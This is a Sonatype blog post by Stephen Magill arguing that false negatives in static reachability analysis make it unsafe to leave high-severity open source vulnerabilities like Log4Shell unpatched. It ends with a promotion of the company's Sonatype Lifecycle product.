Ignoring Log4j and recommending that high-risk open source vulnerabilities be left in application code isn't just irresponsible, it's dangerous.
Mirroring the explosive growth of open source software, analysis around open source vulnerabilities continues to dominate headlines. However, in an alarming trend, many security vendors have begun citing stats that downplay risk to amplify their services, like the recent statistic that "96% of Log4j in use…was not vulnerable to the Log4Shell zero-day."
At first glance this seems like a great result – now you only have to worry about fixing 4% of your applications! However, once you understand how such vulnerability analyses are performed and how exploitability progresses, the idea of having known vulnerable libraries included in your applications tends to become very uncomfortable. In fact, recommending that high-severity open source vulnerabilities be left in application code is more than irresponsible - it's dangerous.
Open source vulnerability analysis
Most security problems in open source software require certain conditions to be met in order for an application to be vulnerable. It may be that an attacker has to be able to get arbitrary data to a particular function argument, or a particular class must be used. Sometimes the application needs to set up a library with a particular non-default configuration. "Vulnerability analysis" (also called "attackability analysis," "exploitability analysis," or "reachability analysis") involves analyzing whether the conditions for triggering a vulnerability exist in the target application. It typically relies on static analysis to compute an approximation of what the program will do at runtime. I've previously discussed both the value and the pitfalls of "attackability" based prioritization.
It is this approximate nature of static analysis that carries risk. Vulnerability analysis can certainly be helpful for prioritizing work, but it should never be used as an excuse to ignore a high-severity vulnerability.
False positives and false negatives
Most questions in static analysis are undecidable – a technical term that means there is no way to always provide a correct yes-or-no answer. For vulnerability analysis, this means that there are cases where the analysis reports that an application is vulnerable, but it actually is not (a "false positive") and cases where the analysis says that everything is safe, but there is actually a vulnerability present (a "false negative"). This second type of issue – false negatives – is the biggest problem with vulnerability analysis, as it provides a false sense of security and can result in vulnerabilities lingering in your software.
In theory, analyses can be constructed that are sound – another technical term that means you can always trust a "not vulnerable" result. However, in practice, this comes with a high number of false positives, eroding the value of this vulnerability analysis as a useful filtering mechanism. Shift Left has not published information on the soundness of their analysis. But, the reported 96% reduction in vulnerabilities, plus the challenge of reasoning in a completely sound way about language features like reflection, makes it unlikely that the underlying vulnerability analysis is completely sound. And in fact, this is the common case in commercial static analysis — some false negatives are accepted in order to keep false positives down and ensure that results are clear and actionable. Because of this, any vulnerability analysis tool is likely to have at least some false negatives in real-world code.
The problem with false negatives
As mentioned above, false negatives provide a false sense of security – they tell a user that there is no vulnerability present when in fact there is. A small false negative rate might be tolerable for low and possibly medium severity security issues. These issues often have restrictive conditions on their exploitability such as non-default configurations or requiring attackers to have authenticated access to the system. Or, they may result in limited attacker capabilities – for example, only allowing observation of sensitive timing information, or revealing log data that should be private, but doesn't disclose cryptographic secrets.
However, the extreme impact of high-severity CVEs – Log4Shell was assigned the highest CVE severity score of 10.0 – means that these security issues should never be ignored. To see why suppose the effective false-negative rate is 1% (far lower than the industry average). And suppose that as a recent study found, 96% of repositories that use insecure versions of Log4j are found to be "not vulnerable" by a vulnerability analysis. Then in an organization with 100 repositories, the probability that at least one of these repositories has a vulnerability even though it was reported as secure is 62%.
With a vulnerability like Log4Shell, which is still being actively exploited and results in full attacker control, this is an unacceptable level of risk. And shifting to patched versions of Log4j is time well spent — CISA Director Jen Easterly recently stated that "We do expect Log4Shell to be used in intrusions well into the future."
Software evolves
Even if a tool did have a 0% false negative rate, the exploitability of a vulnerability is something that evolves over time. When given more time with a library, security researchers and hackers often discover novel ways to exploit a vulnerability that may result in previously "secure" applications now being exploitable. Software also evolves over time, and applications that were not previously susceptible to a vulnerability can become vulnerable with a single small code change.
With the Log4Shell exploit, becoming vulnerable is as simple as adding a new log message that includes some user input. While analysis tools in CI might detect this (assuming it doesn't fall in their "false negative space") this will block a software release and result in unplanned work for the team. It is much better to stay ahead of vulnerabilities by proactively upgrading dependencies even if vulnerability analysis indicates that the application is not yet vulnerable. This proactive work can be scheduled, tracked, and adjusted to be compatible with the development team's capacity. None of this is true for the unplanned work that results from ignoring insecure open source dependencies.
The right way to use vulnerability analysis
Given the fact that false negatives are prevalent in commercial static analysis tools, and that software and exploitability both evolve over time, vulnerability analysis should never be used to justify ignoring high-severity open source security issues. Ideally, vulnerability analysis should be paired with other risk assessment tools such as an analysis of which applications are most business critical, which are most accessible to attackers, and which are outside other layers of protection such as firewalls or VPNs.
When rolling out software composition analysis (SCA), an organization should address the highest-severity vulnerabilities first, and prioritize applications that handle untrusted data and are open to the public Internet. But the best security programs also involve putting a process in place to eventually address all high and medium severity issues and reaching a point where dependencies can be kept up to date as part of an ongoing, planned part of the development process.
Sonatype Lifecycle helps make this achievable by providing low false positive rates – ensuring you have fewer results to work through – and providing carefully vetted remediation advice – speeding the remediation process by ensuring you make efficient upgrade choices.
Written by Stephen Magill
Stephen Magill is Vice President of Product Innovation at Sonatype. He’s the former CEO of MuseDev, a software company acquired by Sonatype, and is dedicated to helping developers write their best code through code quality automation.Stephen is a world-recognized expert on program analysis and was previously a principal scientist at Galois. Among his other accomplishments, he earned his Ph.D and M.S in CS from Carnegie Melon and serves on the University of Tulsa Industry Advisory Board.